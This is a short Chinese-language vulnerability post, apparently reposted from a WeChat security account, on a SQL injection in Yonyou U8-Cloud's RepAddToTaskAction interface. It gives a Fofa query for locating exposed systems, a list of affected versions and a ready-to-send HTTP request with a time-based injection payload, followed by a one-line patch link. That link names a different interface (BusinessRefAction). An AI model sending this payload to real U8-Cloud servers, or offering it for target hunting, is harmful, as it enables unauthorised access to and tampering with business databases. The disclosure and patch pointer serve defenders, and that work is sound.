0x00 前言
U8 Cloud是一款企业上云数字化平台,集交易、服务、管理于一体的ERP整体解决方案用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。
Fofa:app="用友-U8-Cloud"
影响范围:
1.0,2.0,2.1,2.3,2.5,2.6,2.65,2.7,3.0,3.1,3.2,3.5,3.6,3.6sp,5.0,5.0sp,5.1
0x01 漏洞复现
Payload:
GET
/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.RepAddToTaskAction&method=save&taskSelected=1%27);WAITFOR+DELAY+%270:0:5%27--
HTTP/1.1
Host
:
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language
: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection
: close
0x02 修复建议
升级补丁<U8CLOUD系统BusinessRefAction接口存在SQL注入漏洞的安全补丁> https://security.yonyou.com/#/patchInfo?identifier=f6ae798dcf87489cb04307816ad4134f
标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转,RCE
关注星悦安全公众号,持续更新漏洞文章!
原文始发于微信公众号(星悦安全):用友U8-Cloud RepAddToTaskAction 存在SQL注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论